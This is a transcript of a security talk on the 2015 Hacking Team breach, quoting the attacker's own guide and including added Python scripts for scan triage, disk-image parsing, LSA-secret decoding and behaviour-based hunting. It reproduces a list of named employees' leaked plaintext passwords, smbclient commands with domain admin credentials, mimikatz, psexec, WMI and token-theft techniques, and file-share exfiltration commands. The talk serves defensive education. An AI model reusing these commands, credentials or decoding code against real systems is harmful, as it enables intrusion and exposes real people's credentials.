Networking 2016-05-24 - Topic 2 - The "Hack Back" - How Hacking Team Became the "Hacked Team" by...

Date post: 09-Apr-2017
Upload: north-texas-chapter-of-the-issa
Transcript

© 2016 Cybereason Inc. All rights reserved.

The "Hack Back": How Hacking Team became "Hacked Team"

Brad Green, Sr. Sales Engineer


https://youtu.be/R63CRBNLE2o

The Hackers are Hacked

Hacking Team data exfiltration, early July 2015

Hacking Team's Twitter account (@hackingteam) is hijacked and posts links to a 400+ GB torrent file on July 5, 2015

Website defaced to read "Hacked Team"

Inside the Torrent File

All of the Exchange server data

All of the RCS installers + manuals + source code

Important and private documents

Screenshots from employees' machines

Entire Git repository

Pirated software and pirated versions of operating systems

3 full server images (Windows attack server, Android attack server and the helpdesk support server)

TTPs: A Refresher

Tactics: the art or skills employed as means to accomplish an end

Techniques: unique ways or methods performed to accomplish a goal

Procedures: standardized, detailed steps that prescribe how to perform specific tasks

Tactics

Sole reliance on 0-day exploits

100% endpoint privilege escalation

Operations mirroring Flame capabilities

Use of news and adword services ("ad hosting"): C&C uses news-related jargon

Single-shot campaigns tied to ultra-specific targets

Algorithmic assessment of target OS and browser

Switch exploits in real time based on endpoint assessment

Ability to exploit any Windows OS, XP and above

Ability to exploit ANY mobile operating system, including Symbian

Techniques

Gain NT AUTHORITY\SYSTEM privileges in the SYSTEM shell, then execute agent.exe for the RCS client

Spear-phishing and watering-hole delivery mechanisms

Network Injector and Binary Melter

Lazy-looking 404 error pages served to non-intended targets

Use of 0-day exploits for Flash and Java (and Silverlight?)

Use of the Windows kernel vulnerability (CVE-2015-2387) in the OpenType font manager module (ATMFD.dll), which can bypass sandbox mitigation mechanisms

Use of a UEFI BIOS rootkit to keep the Remote Control System agent persistent

Network Injector

". . . a particularly nasty tool that would be plugged into an upstream or ISP backbone. Once active, the network injector would be able to identify the target(s) based on a customer defined rule set and wait for the victim to visit a specific URL, such as YouTube.com. Then, it would automatically redirect the victim to the team's infection server instead."

Melter could be used in conjunction with Network Injector to "melt" the RCS binary into benign software during download

Procedures

Registered domains in Tel Aviv under the name David Cohen (the Israeli equivalent of "John Smith")

Follow the infection server process below for exact target exploitation

Request a cloud-based anonymizing service, using a Virtual Private Server, prior to exploitation and delivery to evade attribution

Who did it?

Single actor takes credit

http://pastebin.com/raw/GPSHF04A (Spanish)
http://pastebin.com/raw/0SNSvyjJ (English)

Pastebin post on April 15th, 2016 in Spanish (followed by English translation)

Part manifesto

Part DIY guide

Part play-by-play

Completely fascinating

His thought process

"In the news we often see attacks traced back to government-backed hacking groups ("APTs"), because they repeatedly use the same tools, leave the same footprints, and even use the same infrastructure (domains, emails, etc). They're negligent because they can hack without legal consequences."

"I didn't want to make the police's work any easier by relating my hack of Hacking Team with other hacks I've done or with names I use in my day-to-day work as a blackhat hacker. So, I used new servers and domain names, registered with new emails, and paid for with new bitcoin addresses. Also, I only used tools that are publicly available, or things that I wrote specifically for this attack, and I changed my way of doing some things to not leave my usual forensic footprint."

Recon - TTPs

"Although it can be tedious, this stage is very important, since the larger the attack surface, the easier it is to find a hole somewhere in it."

Google

Domain and Subdomain Enumeration

WHOIS and Reverse Lookups

Scanning

"The company's IDS might generate an alert, but you don't have to worry since the whole internet is being scanned constantly."

Social Info

LinkedIn, data.com, metadata from published data files

Infiltration

Phishing?

"I didn't want to try to spearphish Hacking Team, as their whole business is helping governments spearphish their opponents, so they'd be much more likely to recognize and investigate a spearphishing attempt."

Buy Access?

"Thanks to hardworking Russians and their exploit kits, traffic sellers, and bot herders, many companies already have compromised computers in their networks. Almost all of the Fortune 500, with their huge networks, have some bots already inside. However, Hacking Team is a very small company, and most of its employees are infosec experts, so there was a low chance that they'd already been compromised."

Exploitation

Hacking Team has a range of public IPs:

inetnum: 93.62.139.32 - 93.62.139.47
descr:   HT public subnet

"What they had was their main website (a Joomla blog in which Joomscan [2] didn't find anything serious), a mail server, a couple routers, two VPN appliances, and a spam filtering appliance."

"So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices."

"A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit. Since the vulnerabilities still haven't been patched, I won't give more details..."

"The worst thing that could happen would be for my backdoor or post-exploitation tools to make the system unstable and cause an employee to investigate. So I spent a week testing my exploit, backdoor, and post-exploitation tools in the networks of other vulnerable companies before entering Hacking Team's network."

Post-Exploitation / C2 / Persistence

"I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device. The backdoor serves to protect the exploit. Using the exploit just once and then returning through the backdoor makes it harder to identify and patch the vulnerabilities."

1) busybox
2) nmap
3) Responder.py
   The most useful tool to attack Windows networks when you have access to the internal network but do not have a domain user.
4) Python
5) tcpdump
6) Dsniff
   I wanted to use ettercap, written by Hacking Team's own ALoR and NaGA, but it was hard to compile it for the system.
7) socat
8) screen
   Like the shell with pty, it wasn't really necessary, but I wanted to feel at home in Hacking Team's network.
9) a SOCKS proxy server
   To use with proxychains to access the internal network with any other program.

Exploitation Successful

"Now inside their internal network, I wanted to take a look around and think about my next step. I started Responder.py in analysis mode (-A to listen without sending poisoned responses), and did a slow scan with nmap."

"Just when I was worried that they'd finally patched all of the authentication bypass bugs in MySQL [2][3][4][5], new databases came into style that lack authentication by design. Nmap found a few in Hacking Team's internal network:"

"They were the databases for test instances of RCS. The audio that RCS records is stored in MongoDB with GridFS. The audio folder in the torrent [6] came from this. They were spying on themselves without meaning to."

27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 47547
|   totalSize = 49856643072
...
|_  Version = 2.6.5

27017/tcp open  mongodb  MongoDB 2.6.5
| mongodb-databases:
|   ok = 1
|   totalSizeMb = 31987
|   totalSize = 33540800512
|   DATABASES
...
|_  Version = 2.6.5

Internal Recon Finds Fruit

"Their insecure backups were the vulnerability that opened their doors. According to their documentation [1], their iSCSI devices were supposed to be on a separate network, but nmap found a few in their subnetwork"

Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:ht-synology.name
|     Address: 192.168.200.66:3260,0
|_    Authentication: No authentication required

Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
...
3260/tcp open  iscsi?
| iscsi-info:
|   Target: iqn.2000-01.com.synology:synology-backup.name
|     Address: 10.0.1.72:3260,0
|     Address: 192.168.200.72:3260,0
|_    Authentication: No authentication required

"iSCSI needs a kernel module, and it would've been difficult to compile it for the embedded system. I forwarded the port so that I could mount it from a VPS:"
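Both findings on these two slides (MongoDB answering listDatabases without credentials, iSCSI targets reporting "No authentication required") come straight out of nmap NSE output. The triage script below is an added example, not part of the presentation or of the Hack Back guide: it walks an nmap XML report and lists exactly those two conditions, so a defender can run the same internal scan and find the unauthenticated storage before someone else does. The XML is constructed and simplified (three hosts, one of them properly authenticated); the NSE output text it contains mirrors the listings above, but the precise wording emitted by newer nmap versions is an assumption.

```python
"""Triage an nmap XML report for unauthenticated MongoDB and iSCSI services.

Added example; not from the presentation or the guide. The XML below is a
constructed, simplified `nmap -sV --script mongodb-databases,iscsi-info -oX`
report; the script output strings are assumed to match the listings above."""
import xml.etree.ElementTree as ET

# Constructed sample report (not real scan data): three hosts, the last one clean.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.200.66" addrtype="ipv4"/>
    <hostnames><hostname name="ht-synology.hackingteam.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="3260">
        <state state="open"/>
        <service name="iscsi"/>
        <script id="iscsi-info" output="&#10;  Target: iqn.2000-01.com.synology:ht-synology.name&#10;    Address: 192.168.200.66:3260,0&#10;    Authentication: No authentication required"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.168.200.10" addrtype="ipv4"/>
    <hostnames><hostname name="rcs-test.hackingteam.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="27017">
        <state state="open"/>
        <service name="mongodb" product="MongoDB" version="2.6.5"/>
        <script id="mongodb-databases" output="&#10;  ok = 1&#10;  totalSizeMb = 47547&#10;  Version = 2.6.5"/>
      </port>
    </ports>
  </host>
  <host>
    <address addr="192.168.200.20" addrtype="ipv4"/>
    <hostnames><hostname name="fileserver.hackingteam.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="27017">
        <state state="open"/>
        <service name="mongodb" product="MongoDB" version="3.0.0"/>
        <script id="mongodb-databases" output="&#10;  ok = 0&#10;  errmsg = not authorized on admin to execute command"/>
      </port>
      <port protocol="tcp" portid="3260">
        <state state="open"/>
        <service name="iscsi"/>
        <script id="iscsi-info" output="&#10;  Target: iqn.2000-01.com.synology:backup&#10;    Authentication: CHAP required"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def find_unauthenticated_services(xml_text):
    """Return [(ip, hostname, port, finding)] for open ports whose NSE output
    shows the service handing out data without credentials."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else ip
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            portid = int(port.get("portid"))
            for script in port.findall("script"):
                sid, out = script.get("id"), script.get("output", "")
                # mongodb-databases only reports ok = 1 when listDatabases ran
                # without auth; a server enforcing auth answers ok = 0.
                if sid == "mongodb-databases" and "ok = 1" in out:
                    findings.append((ip, hostname, portid,
                                     "MongoDB lists databases without authentication"))
                # iscsi-info echoes the target's authentication requirement.
                elif sid == "iscsi-info" and "No authentication required" in out:
                    findings.append((ip, hostname, portid,
                                     "iSCSI target exposes LUNs without authentication"))
    return findings


if __name__ == "__main__":
    for ip, hostname, portid, finding in find_unauthenticated_services(SAMPLE_NMAP_XML):
        print(f"{ip:16} {hostname:32} {portid:>5}/tcp  {finding}")
```

Feed it a real report with `nmap -sV -p 27017,3260 --script mongodb-databases,iscsi-info -oX scan.xml <subnet>`; the point is that the check is on the service's own behaviour, not on a product name or version string.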

Mount the NAS

[A lot of complicated work with traffic forwarding and VPS]

"...the device file appears! We mount it... and find backups of various virtual machines. The Exchange server seemed like the most interesting. It was too big to download, but it was possible to mount it remotely to look for interesting files:"

$ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
$ fdisk -l /dev/loop0
/dev/loop0p1        2048  1258287103   629142528    7  HPFS/NTFS/exFAT
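The fdisk listing above is what makes the next step possible: a flat VMDK is a raw disk, and the partition table tells you where the NTFS filesystem starts. If the kernel did not scan partitions for you (older losetup without -P, or a device that cannot be re-attached), you mount the filesystem with `mount -o offset=<first_sector*512>`. The parser below is an added example, not from the presentation or the guide; it reads the MBR of an image and computes that offset. The 512-byte MBR it uses is constructed to describe the same partition fdisk printed (type 7, first sector 2048, last sector 1258287103), and its build_mbr helper exists only so the block runs offline.

```python
"""Find the byte offset of a partition in a raw disk image so it can be
mounted with `mount -o offset=N` when /dev/loop0p1 was not created.

Added example, not from the presentation or the guide. The sample MBR is
constructed to match the fdisk output above."""
import struct

SECTOR = 512
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, first LBA, sector count


def build_mbr(entries):
    """Constructed sample data only: an MBR holding the given
    (type, first_lba, sector_count) entries and a valid 0x55AA signature."""
    mbr = bytearray(SECTOR)
    for i, (ptype, first_lba, count) in enumerate(entries):
        off = 446 + 16 * i
        mbr[off:off + 16] = struct.pack(ENTRY_FMT, 0x80 if i == 0 else 0x00,
                                        b"\xff\xff\xfe", ptype, b"\xff\xff\xfe",
                                        first_lba, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


def parse_mbr(mbr):
    """Return [(index, type, first_lba, sector_count)] for the used primary entries."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not an MBR: bad signature")
    parts = []
    for i in range(4):
        off = 446 + 16 * i
        _status, _chs0, ptype, _chs1, first_lba, count = struct.unpack(ENTRY_FMT, mbr[off:off + 16])
        if ptype != 0 and count != 0:
            parts.append((i + 1, ptype, first_lba, count))
    return parts


def mount_offset(mbr, index=1):
    """Byte offset of partition `index` (1-based): the value for mount -o offset=N."""
    for i, _ptype, first_lba, _count in parse_mbr(mbr):
        if i == index:
            return first_lba * SECTOR
    raise ValueError(f"partition {index} not present")


# Partition from the fdisk listing above: sectors 2048..1258287103 inclusive.
SAMPLE_MBR = build_mbr([(0x07, 2048, 1258287103 - 2048 + 1)])

if __name__ == "__main__":
    # On a real image: with open(path, "rb") as f: mbr = f.read(512)
    for idx, ptype, first, count in parse_mbr(SAMPLE_MBR):
        print(f"p{idx}: type 0x{ptype:02x} start={first} sectors={count} 1K-blocks={count // 2}")
    print(f"mount -o ro,offset={mount_offset(SAMPLE_MBR)} /dev/loop0 /mnt/exchange")
```

The 1K-blocks column it prints (629142528) is the same number fdisk shows, which is a quick sanity check that the table was read from the right place. Mount read-only when the image is evidence.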

"What interested me most in the backup was seeing if it had a password or hash that could be used to access the live server. I used pwdump, cachedump, and lsadump [1] on the registry hives. lsadump found the password to the besadmin service account:"

_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
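The hex dump above is the decrypted LSA secret for a service (`_SC_` prefix means a service logon password): a little-endian length DWORD (0x16 = 22 bytes), 12 bytes the dumpers leave uninterpreted, then the password as UTF-16LE. The decoder below is an added example, not code from the presentation or the guide; it parses lsadump-style output back into bytes and extracts the service password, which is how "bes32678!!!" falls out of the dump. The blob layout it assumes is the LSA_SECRET_BLOB structure that creddump and impacket use for Vista-and-later secrets; the dump text is the three lines shown above, retyped.

```python
"""Decode lsadump-style hex dumps of LSA secrets back into service passwords.

Added example; not from the presentation or the guide. Blob layout assumed:
Length (LE DWORD), 12 unknown bytes, then Length bytes of UTF-16LE secret."""
import re
import struct

# Retyped from the dump on this slide.
LSADUMP_TEXT = """_SC_BlackBerry MDS Connection Service
0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........
"""

# offset, then up to 16 hex byte pairs; the ASCII column is ignored.
HEX_LINE = re.compile(r"^([0-9a-fA-F]{4})\s+((?:[0-9a-fA-F]{2}\s?){1,16})")


def parse_lsadump(text):
    """Return {secret_name: bytes}. A name line is followed by hex rows."""
    secrets, name, buf = {}, None, bytearray()
    for line in text.splitlines():
        m = HEX_LINE.match(line)
        if m:
            if name is None:
                raise ValueError("hex row before any secret name")
            if int(m.group(1), 16) != len(buf):
                raise ValueError(f"offset gap in dump for {name}")
            buf.extend(bytes.fromhex(m.group(2).replace(" ", "")))
        elif line.strip():
            if name is not None:
                secrets[name] = bytes(buf)
            name, buf = line.strip(), bytearray()
    if name is not None:
        secrets[name] = bytes(buf)
    return secrets


def decode_secret_blob(blob):
    """Extract the secret from an LSA_SECRET_BLOB; text if it is valid UTF-16LE."""
    if len(blob) < 16:
        raise ValueError("blob shorter than its 16-byte header")
    (length,) = struct.unpack_from("<L", blob, 0)
    if 16 + length > len(blob):
        raise ValueError("declared length exceeds blob")
    secret = blob[16:16 + length]
    try:
        return secret.decode("utf-16-le")
    except UnicodeDecodeError:
        return secret


def service_passwords(text):
    """Map each _SC_<service> secret (a service account's logon password) to its value."""
    return {name[len("_SC_"):]: decode_secret_blob(blob)
            for name, blob in parse_lsadump(text).items() if name.startswith("_SC_")}


if __name__ == "__main__":
    for svc, pw in service_passwords(LSADUMP_TEXT).items():
        print(f"service {svc!r} logs on with password {pw!r}")
```

The defensive lesson is in the prefix: every `_SC_` secret is a plaintext service password that any backup of SYSTEM and SECURITY hives gives away, so service accounts should be group managed service accounts or at least not local administrators on other hosts.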

Explore the Backups

"I used proxychains [2] with the socks server on the embedded device and smbclient [3] to check the password:"

proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

"It worked! The password for besadmin was still valid, and a local admin. I used my proxy and metasploit's psexec_psh [4] to get a meterpreter session. Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and got a bunch of passwords, including the Domain Admin:"

The Passwords

HACKINGTEAM  BESAdmin       bes32678!!!
HACKINGTEAM  Administrator  uu8dd8ndd12!
HACKINGTEAM  c.pozzi        P4ssword          <---- lol great sysadmin
HACKINGTEAM  m.romeo        ioLK/(90
HACKINGTEAM  l.guerra       4luc@=.=
HACKINGTEAM  d.martinez     W4tudul3sp
HACKINGTEAM  g.russo        GCBr0s0705!
HACKINGTEAM  a.scarafile    Cd4432996111
HACKINGTEAM  r.viscardi     Ht2015!
HACKINGTEAM  a.mino         A!e$$andra
HACKINGTEAM  m.bettini      Ettore&Bella0314
HACKINGTEAM  m.luppi        Blackou7
HACKINGTEAM  s.gallucci     1S9i8m4o!
HACKINGTEAM  d.milan        set!dob66
HACKINGTEAM  w.furlan       Blu3.B3rry!
HACKINGTEAM  d.romualdi     Rd13136f@#
HACKINGTEAM  l.invernizzi   L0r3nz0123!
HACKINGTEAM  e.ciceri       2O2571&2E
HACKINGTEAM  e.rabe         erab@4HT!

"Many have made fun of Christian Pozzi's weak passwords..." "...The reality is that mimikatz and keyloggers view all passwords equally."

A word on Lateral Movement

Remote Movement:

1) psexec
The tried and true method for lateral movement on Windows.

2) WMI
The most stealthy method. The WMI service is enabled on all Windows computers, but except for servers, the firewall blocks it by default.

3) PS Remoting [10]
It's disabled by default, and I don't recommend enabling new protocols. But, if the sysadmin has already enabled it, it's very convenient, especially if you use powershell for everything (and you should use powershell for almost everything, it will change [11] with powershell 5 and Windows 10, but for now powershell makes it easy to do everything in RAM, avoid AV, and leave a small footprint).

4) Scheduled Tasks
You can execute remote programs with at and schtasks [5]. It works in the same situations where you could use psexec, and it also leaves a well known footprint [12].

5) GPO
If all those protocols are disabled or blocked by the firewall, once you're Domain Admin, you can use GPO to give users a login script, install an msi, execute a scheduled task [13], or, like we'll see with the computer of Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and open the firewall.

A word on "In-Place" Movement (Changing context)

1) Token Stealing
Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain. Two tools for doing this are incognito [1] and the mimikatz token::* commands [2].

2) MS14-068
You can take advantage of a validation bug in Kerberos to generate Domain Admin tickets [3][4][5].

3) Pass the Hash
If you have a user's hash, but they're not logged in, you can use sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection
Any RAT can inject itself into other processes. For example, the migrate command in meterpreter and pupy [6], or the psinject [7] command in powershell empire. You can inject into the process that has the token you want.

5) runas
This is sometimes very useful since it doesn't require admin privileges. The command is part of Windows, but if you don't have a GUI you can use powershell [8].

"One of my favorite hobbies is hunting sysadmins"

"Reading their documentation about their infrastructure [1], I saw that I was still missing access to something important - the "Rete Sviluppo", an isolated network with the source code for RCS. The sysadmins of a company always have access to everything, so I searched the computers of Mauro Romeo and Christian Pozzi to see how they administer the Sviluppo network, and to see if there were any other interesting systems I should investigate. It was simple to access their computers, since they were part of the Windows domain where I'd already gotten admin access. Mauro Romeo's computer didn't have any ports open, so I opened the port for WMI [2] and executed meterpreter [3]. In addition to keylogging and screen scraping with Get-Keystrokes and Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1 [4], and searched for interesting files [5]. Upon seeing that Pozzi had a Truecrypt volume, I waited until he'd mounted it and then copied off the files."

The Bridge

"Within Christian Pozzi's Truecrypt volume, there was a text file with many passwords [1]. One of those was for a Fully Automated Nagios server, which had access to the Sviluppo network in order to monitor it. I'd found the bridge I needed. The text file just had the password to the web interface, but there was a public code execution exploit [2] (it's an unauthenticated exploit, but it requires that at least one user has a session initiated, for which I used the password from the text file)."

Data Exfiltration

"With the Domain Admin password, I have access to the email, the heart of the company. Curiously, I found a bug with Powershell's date handling. After downloading the emails, it took me another couple weeks to get access to the source code and everything else, so I returned every now and then to download the new emails. The server was Italian, with dates in the format day/month/year. I used:"

-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

"Now that I'd gotten Domain Admin, I started to download file shares using my proxy and the -Tc option of smbclient, for example:"

proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

"I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in the torrent like that."

What it Means – TTPs Reign Supreme

What it costs the attacker to change each indicator, from cheapest to most expensive:

• Hash values: recompile
• Signatures: obfuscator
• Domain names: stolen credit card
• IP addresses: botnet, hacked server, hosting
• Tools: custom development
• TTPs: years of innovation

What it Means – MITRE ATT&CK Model: Adversarial Tactics, Techniques, & Common Knowledge

What it Means – Hunt!

[Timeline chart: Damage vs. Time (seconds, minutes, hours, days, weeks, months). Phases along the axis: Penetration → Recon → Spread → C&C → Damage; the "hacking operation" spans the middle and "breach detected" sits at the far right.]

Increase focus on actively hunting your adversary at the endpoint

Static IOCs are important but not enough – detect attackers by their behavior
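Hunting by behaviour rather than by hash means writing rules against what the lateral-movement slides above describe: a service installed remotely (psexec, or metasploit's psexec_psh with a PowerShell one-liner as the service binary), a process whose parent is the WMI provider host, a scheduled task that runs a script interpreter, and PowerShell started hidden with an encoded command. The script below is an added example, not part of the presentation; it runs those four rules over constructed JSON-lines records shaped like forwarded Security 4688/4698 and System 7045 events, and then pivots on accounts whose flagged activity spans several hosts, which is the "spread" phase of the chart above regardless of tool. The field names follow the Windows event XML but are an assumption about your collector; the ATT&CK technique IDs are the current ones for these behaviours.

```python
"""Behaviour-based hunting over Windows event records.

Added example, not from the presentation. Records are constructed JSON lines;
field names are an assumption about the log collector."""
import json
import re

# Constructed sample telemetry: six events, the last two benign.
SAMPLE_EVENTS = r"""
{"EventID": 7045, "Computer": "srv-file01", "ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "AccountName": "HACKINGTEAM\\Administrator"}
{"EventID": 4688, "Computer": "ws-mromeo", "NewProcessName": "C:\\Windows\\System32\\cmd.exe", "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "SubjectUserName": "Administrator"}
{"EventID": 4698, "Computer": "ws-cpozzi", "TaskName": "\\Update", "SubjectUserName": "Administrator", "TaskContent": "<Exec><Command>powershell.exe</Command><Arguments>-nop -w hidden -f C:\\Users\\Public\\u.ps1</Arguments></Exec>"}
{"EventID": 4688, "Computer": "ws-cpozzi", "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentProcessName": "C:\\Windows\\System32\\svchost.exe", "SubjectUserName": "Administrator", "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3"}
{"EventID": 4688, "Computer": "ws-lguerra", "NewProcessName": "C:\\Program Files\\Mozilla Firefox\\firefox.exe", "ParentProcessName": "C:\\Windows\\explorer.exe", "SubjectUserName": "l.guerra"}
{"EventID": 7045, "Computer": "srv-print01", "ServiceName": "Spooler Helper", "ImagePath": "C:\\Program Files\\Vendor\\helper.exe", "AccountName": "SYSTEM"}
"""

PS_HIDDEN_FLAGS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                   "-enc ", "-encodedcommand", "-e ")


def is_powershell_oneliner(cmdline):
    """PowerShell invoked with the flags in-memory tradecraft relies on."""
    c = " ".join(cmdline.lower().split())
    return "powershell" in c and any(flag in c for flag in PS_HIDDEN_FLAGS)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def account_of(e):
    return (e.get("SubjectUserName") or e.get("AccountName") or "?").split("\\")[-1]


# (rule name, ATT&CK technique, predicate over one event)
RULES = [
    ("psexec-style remote service install", "T1569.002",
     lambda e: e["EventID"] == 7045 and (e.get("ServiceName", "").upper() == "PSEXESVC"
                                         or is_powershell_oneliner(e.get("ImagePath", "")))),
    ("process spawned by WMI provider host", "T1047",
     lambda e: e["EventID"] == 4688 and basename(e.get("ParentProcessName", "")) == "wmiprvse.exe"),
    ("scheduled task that runs a script interpreter", "T1053.005",
     lambda e: e["EventID"] == 4698 and re.search(
         r"<Command>[^<]*(powershell|cmd\.exe|wscript|cscript|rundll32)",
         e.get("TaskContent", ""), re.I) is not None),
    ("hidden/encoded PowerShell launch", "T1059.001",
     lambda e: e["EventID"] == 4688 and is_powershell_oneliner(e.get("CommandLine", ""))),
]


def hunt(jsonl):
    """Run every rule over every record; return one hit per (event, rule) match."""
    hits = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        e = json.loads(line)
        for name, technique, pred in RULES:
            if pred(e):
                hits.append({"host": e["Computer"], "account": account_of(e),
                             "rule": name, "technique": technique})
    return hits


def accounts_spanning_hosts(hits, min_hosts=2):
    """Pivot: accounts whose flagged activity touches min_hosts or more computers."""
    by_acct = {}
    for h in hits:
        by_acct.setdefault(h["account"], set()).add(h["host"])
    return {a: hosts for a, hosts in by_acct.items() if len(hosts) >= min_hosts}


if __name__ == "__main__":
    hits = hunt(SAMPLE_EVENTS)
    for h in hits:
        print(f"{h['host']:12} {h['account']:14} {h['technique']:10} {h['rule']}")
    for acct, hosts in accounts_spanning_hosts(hits).items():
        print(f"{acct} executing on {len(hosts)} hosts: {', '.join(sorted(hosts))}")
```

None of the rules would be defeated by recompiling a tool or moving to a new server; the attacker has to change how they move, which is the point of the pyramid on the previous slide. Tune the scheduled-task rule against your own baseline before alerting on it, since legitimate software also creates tasks that run scripts.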

Thank you. www.cybereason.com

Interesting Things: Robust Internal Documentation

Interesting Things

Silverlight exploit: CVE-2016-0034 (January 2016, MS16-006):
• Purchased from Vitaliy Toropov for $45k in 2013
• Toropov claims it was written 2.5 years prior
• Kaspersky researchers write a YARA rule based on POC code from the email
• First YARA hit November 25, 2015 (sample compiled July 21, 2015)

Interesting Things

At the time of the breach:

tmp_privesc has a 0/55 on VT. mynewsfeeds.info is pretty clean, too.

Following the breach, dozens of hashes started showing up on VT – likely due to numerous groups downloading and compiling the code

Interesting Things

Internal posting speculating on the number of zero-days in play:
- Assumes a zero-day persists for an average of 312 days before detection
- References Stefan Frei (NSS Labs in Austin)

"Frei said that in light of the present zero-day reality, he has three pieces of advice for C-Level executives:
- Assume you are compromised, and that you will get compromised again.
- Prevention is limited; invest in breach detection so that you can quickly find and act on any compromises.
- Make sure you have a process for properly responding to compromises when they do happen."

